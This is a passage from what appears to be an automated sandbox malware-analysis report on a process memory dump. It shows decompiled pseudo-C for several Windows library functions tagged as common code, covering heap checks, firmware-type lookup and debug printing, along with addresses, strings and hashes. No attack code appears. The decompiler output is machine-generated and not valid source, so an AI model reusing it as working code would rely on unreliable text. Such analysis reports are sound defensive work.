						break;
					}
					return E01B5AB40(_t39, _t38, 0, _t13, _t40);
				} else {
					_t31 = _t39 + 0x8c;
					_t16 =  *_t31;
					while(_t31 != _t16) {
						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
							return _t16;
						}
						_t16 =  *_t16;
					}
					return _t31;
				}
			}

0x01b5b8f0
0x01b5b8f2
0x01b5b8f4
0x01ba2c4e
0x01ba2c50
0x01ba2c56
0x01ba2c5c
0x01ba2c60
0x01ba2c7f
0x01ba2c84
0x01ba2c62
0x01ba2c77
0x01ba2c7c
0x01ba2c8a
0x01ba2c8f
0x01ba2c94
0x01ba2c9c
0x01ba2ca5
0x01ba2ca5
0x01ba2c9c
0x01ba2c50
0x01b5b8fa
0x01b5b902
0x01b5b921
0x01b5b921
0x01b5b924
0x01b5b924
0x01b5b927
0x00000000
0x00000000
0x01b5b929
0x01b5b92b
0x01b5b92d
0x01b5b940
0x00000000
0x01b5b940
0x01b5b932
0x01b5b932
0x00000000
0x01b5b932
0x00000000
0x01b5b904
0x01b5b904
0x01b5b90a
0x01b5b90c
0x01b5b916
0x01b5b919
0x01b5b915
0x01b5b915
0x01b5b91b
0x01b5b91b
0x00000000
0x01b5b910

Strings

(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 01BA2C8A
HEAP[%wZ]: , xrefs: 01BA2C72
HEAP: , xrefs: 01BA2C7F

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: d76e7c47ab8573e07cc075be9820dc66c619723193dd88182ddd719ef81ecb89
Instruction ID: d44fc42b93dca2053153a3a038b19fc96806777a1807d07ec2aedb9a05671b60
Opcode Fuzzy Hash: d76e7c47ab8573e07cc075be9820dc66c619723193dd88182ddd719ef81ecb89
Instruction Fuzzy Hash: 5C11E6313145029FDB6DDB1AC684F35B7B6EF90620F1481EDE80ACB255E770D844C741

Uniqueness

Uniqueness Score: -1.00%

Function 01BFE539, Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E01BFE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E01BFBBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E01BFBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E01BFAFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E01B79730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E01BFA80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E01BFA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E01B79730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E01BFA80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E01BFA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E01B52280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E01B4B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E01B4FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E01B57D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E01BEFEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x01bfe547
0x01bfe549
0x01bfe54f
0x01bfe553
0x01bfe557
0x01bfe55a
0x01bfe55c
0x01bfe55f
0x01bfe561
0x01bfe567
0x01bfe56b
0x01bfe7e2
0x00000000
0x01bfe571
0x01bfe575
0x01bfe577
0x01bfe57b
0x01bfe57c
0x01bfe57d
0x01bfe57e
0x01bfe57f
0x01bfe588
0x01bfe58f
0x01bfe591
0x01bfe592
0x01bfe592
0x01bfe596
0x01bfe59e
0x01bfe5a0
0x01bfe5a6
0x01bfe61d
0x01bfe61d
0x01bfe621
0x01bfe623
0x01bfe630
0x01bfe630
0x01bfe7e6
0x01bfe7eb
0x01bfe7ed
0x01bfe7f4
0x01bfe7fa
0x01bfe7ff
0x01bfe7ff
0x01bfe80a
0x01bfe812
0x01bfe812
0x01bfe5ab
0x01bfe5b4
0x01bfe5b9
0x01bfe5be
0x01bfe5c0
0x01bfe5c2
0x01bfe5c8
0x01bfe5c9
0x01bfe5cb
0x01bfe5cc
0x01bfe5d5
0x01bfe5e4
0x01bfe5f1
0x01bfe5f8
0x01bfe5f8
0x01bfe5d5
0x01bfe602
0x01bfe616
0x01bfe63d
0x01bfe644
0x01bfe64d
0x01bfe652
0x01bfe657
0x01bfe659
0x01bfe65b
0x01bfe661
0x01bfe662
0x01bfe664
0x01bfe665
0x01bfe66e
0x01bfe67d
0x01bfe68a
0x01bfe691
0x01bfe691
0x01bfe66e
0x01bfe6b0
0x00000000
0x01bfe6b6
0x01bfe6bd
0x01bfe6c7
0x01bfe6d7
0x01bfe6d9
0x01bfe6db
0x01bfe6de
0x01bfe6e3
0x01bfe6f3
0x01bfe6fc
0x01bfe700
0x01bfe700
0x01bfe704
0x01bfe70a
0x01bfe70a
0x01bfe713
0x01bfe716
0x01bfe719
0x01bfe720
0x01bfe761
0x01bfe76b
0x01bfe774
0x01bfe77a
0x01bfe77a
0x01bfe78a
0x01bfe791
0x01bfe799
0x01bfe79b
0x01bfe79f
0x01bfe7aa
0x01bfe7c0
0x01bfe7ac
0x01bfe7b2
0x01bfe7b9
0x01bfe7b9
0x01bfe7c7
0x01bfe806
0x00000000
0x01bfe7c9
0x01bfe7d1
0x01bfe7d8
0x00000000
0x01bfe7d8
0x00000000
0x00000000
0x01bfe722
0x01bfe72e
0x01bfe748
0x01bfe74c
0x01bfe754
0x01bfe756
0x01bfe75c
0x01bfe75c
0x00000000
0x01bfe75c
0x01bfe758
0x01bfe758
0x00000000
0x01bfe758
0x01bfe750
0x00000000
0x00000000
0x01bfe752
0x00000000
0x01bfe752
0x01bfe730
0x01bfe735
0x01bfe73d
0x01bfe73f
0x00000000
0x00000000
0x01bfe741
0x01bfe741
0x00000000
0x01bfe741
0x01bfe739
0x00000000
0x00000000
0x01bfe73b
0x00000000
0x01bfe73b
0x01bfe722
0x01bfe720
0x01bfe6b0
0x01bfe618
0x00000000
0x01bfe618

Strings

`, xrefs: 01BFE670
`, xrefs: 01BFE5D7

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: 9d68618fb105b923672ba42d8c1de7c20a4adf5e46d6e90c5f0483520dde0c66
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: 889171312043429FEB28CE29C945B2BBBE5EF84714F15896DF795CB290E774E908CB52

Uniqueness

Uniqueness Score: -1.00%

Function 01BB51BE, Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E01BB51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x1c105f0);
				E01B8D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E01B4EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E01BB53CA(0);
						return E01B8D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E01B7F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E01B53690(1, _t117, 0x1b11810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E01B7AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L01B54620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E01B7AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E01BB500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E01B79860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x01bb51be
0x01bb51c3
0x01bb51c8
0x01bb51cd
0x01bb51d0
0x01bb51d3
0x01bb51d8
0x01bb51db
0x01bb51de
0x01bb51e0
0x01bb51e3
0x01bb51e6
0x01bb51e8
0x01bb5342
0x01bb5351
0x01bb5356
0x01bb535a
0x01bb5360
0x01bb5363
0x01bb5366
0x01bb5369
0x01bb5369
0x01bb536b
0x01bb536b
0x01bb5370
0x01bb53a3
0x01bb53a4
0x01bb53a6
0x01bb53ab
0x01bb53ab
0x01bb53ae
0x01bb53ae
0x01bb53b5
0x01bb53bf
0x01bb53bf
0x01bb5375
0x01bb5396
0x01bb53a0
0x01bb53a0
0x00000000
0x01bb5396
0x01bb5377
0x01bb5379
0x01bb537f
0x01bb538c
0x01bb5390
0x00000000
0x01bb5390
0x01bb51ee
0x01bb51f1
0x01bb5301
0x01bb5310
0x01bb5315
0x01bb5318
0x01bb531b
0x01bb5320
0x01bb532e
0x01bb5331
0x00000000
0x01bb5331
0x01bb5328
0x01bb5329
0x00000000
0x01bb5329
0x01bb51fa
0x01bb5235
0x01bb5236
0x01bb5239
0x01bb523f
0x01bb5240
0x01bb5241
0x01bb5242
0x01bb5246
0x01bb5247
0x01bb524e
0x01bb5251
0x01bb5267
0x01bb5269
0x01bb526e
0x01bb527d
0x01bb527e
0x01bb5281
0x01bb5282
0x01bb5287
0x01bb5288
0x01bb528a
0x01bb528f
0x01bb5294
0x00000000
0x00000000
0x01bb529a
0x01bb529c
0x01bb529e
0x01bb529e
0x01bb52a4
0x01bb52b0
0x00000000
0x00000000
0x01bb52ba
0x01bb52bc
0x01bb52bc
0x01bb52d4
0x01bb52d9
0x01bb52dc
0x01bb52e1
0x00000000
0x00000000
0x01bb52e7
0x01bb52f4
0x00000000
0x01bb52f4
0x01bb5270
0x00000000
0x01bb5270
0x01bb51fc
0x01bb51fd
0x01bb5202
0x01bb5203
0x01bb5205
0x01bb520a
0x01bb520f
0x00000000
0x00000000
0x01bb521b
0x01bb5226
0x01bb522b
0x01bb521d
0x01bb521d
0x01bb5222
0x01bb5222
0x01bb522d
0x00000000

Strings

UEFI, xrefs: 01BB521D
Legacy, xrefs: 01BB5226

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 5bc7f30eb72a9d95ba34a7e8a36b5775100868c0c761ee3a722a49f0b0f892bd
Instruction ID: 877fd1e244f4849cc89cc6a40178fa15314d9fa7f3edab53607c562f62d98c46
Opcode Fuzzy Hash: 5bc7f30eb72a9d95ba34a7e8a36b5775100868c0c761ee3a722a49f0b0f892bd
Instruction Fuzzy Hash: F6517C71A016099FDB28DFA8C8C0ABDBBF8FB48700F1440ADE61AEB651D7B19900CB11

Uniqueness

Uniqueness Score: -1.00%

Function 01B3B171, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E01B3B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x1c0f7a8);
				E01B8D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E01B8D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E01B7D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E01B7F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L01B8DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E01B7B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E01B7B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E01B7E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E01B7A890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x01b3b171
0x01b3b171
0x01b3b171
0x01b3b171
0x01b3b171
0x01b3b176
0x01b3b17b
0x01b3b180
0x01b3b186
0x01b3b18f
0x01b3b198
0x01b3b1a4
0x01b3b1aa
0x01b94802
0x01b94802
0x01b94805
0x01b9480c
0x01b9480e
0x01b3b1d1
0x01b3b1d3
0x01b3b1de
0x01b3b1de
0x01b94817
0x01b9481e
0x01b94820
0x01b94822
0x01b94822
0x01b94824
0x01b94824
0x01b9482a
0x00000000
0x00000000
0x01b94835
0x01b9483a
0x01b9483d
0x01b9483f
0x01b94842
0x01b94842
0x01b94842
0x01b94846
0x01b9484c
0x01b9484e
0x01b94851
0x01b94851
0x01b94853
0x01b94854
0x01b94854
0x01b94858
0x01b9485a
0x01b9485a
0x01b9485d
0x01b9485f
0x01b94861
0x01b94861
0x01b94866
0x01b9486b
0x01b9486e
0x01b94871
0x01b94876
0x01b94876
0x01b94878
0x01b9487b
0x01b94884
0x01b94884
0x00000000
0x01b9487d
0x01b9487d
0x01b94882
0x01b94889
0x01b94889
0x01b9488f
0x01b94891
0x01b948e0
0x01b948e2
0x01b948e4
0x01b948e4
0x01b948e7
0x01b948e7
0x01b948ed
0x01b948f4
0x01b948f6
0x01b94951
0x01b94951
0x01b94953
0x01b94953
0x01b94956
0x01b94956
0x01b94958
0x01b94959
0x01b94959
0x01b9495d
0x01b9495d
0x01b9495f
0x01b9495f
0x01b94965
0x01b94969
0x01b949ba
0x01b949ba
0x01b949c1
0x01b949c5
0x01b949cc
0x01b949d4
0x01b949d7
0x01b949da
0x01b949e4
0x01b949e5
0x01b949f3
0x01b94a02
0x00000000
0x01b94a02
0x01b94972
0x01b94974
0x00000000
0x00000000
0x01b94976
0x01b94979
0x01b94982
0x01b94983
0x01b94984
0x01b9498b
0x01b9498d
0x01b94991
0x01b94993
0x01b94999
0x01b9499d
0x01b949a2
0x01b949a2
0x01b949a2
0x01b94999
0x01b949ac
0x00000000
0x01b949b3
0x01b948f8
0x01b948fe
0x00000000
0x00000000
0x00000000
0x01b948fe
0x01b94895
0x01b9489c
0x01b948ad
0x01b948b2
0x01b948b5
0x01b948b7
0x01b948ba
0x01b948bc
0x01b948c6
0x01b948c6
0x01b948cb
0x01b948d1
0x01b948d4
0x01b948d8
0x01b948d8
0x00000000
0x01b948d8
0x01b948be
0x01b948c0
0x00000000
0x00000000
0x01b948c2
0x00000000
0x00000000
0x00000000
0x01b948c4
0x00000000
0x01b94882
0x01b9487b
0x01b94904
0x01b94906
0x00000000
0x00000000
0x01b94908
0x01b9490e
0x00000000
0x00000000
0x01b94910
0x01b94917
0x01b94917
0x00000000
0x01b94917
0x01b3b1ba
0x01b947f9
0x01b947fc
0x00000000
0x00000000
0x00000000
0x01b947fc
0x01b3b1c0
0x01b3b1c0
0x01b3b1c3
0x01b3b1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 01B948AD

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: e353693e06213c721517d3de4bf70a3e27b7597765c608a7c595fa17abe9b0d6
Instruction ID: 9f57e773a85675bb3359bac440a5879db6cfc35f9c7671bc41ce48ee5f134791
Opcode Fuzzy Hash: e353693e06213c721517d3de4bf70a3e27b7597765c608a7c595fa17abe9b0d6
Instruction Fuzzy Hash: 5351BF71D102598EDF399F688A84BAEBBB0EF05714F1042FDD869AB282D7704947CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01B5B944, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E01B5B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
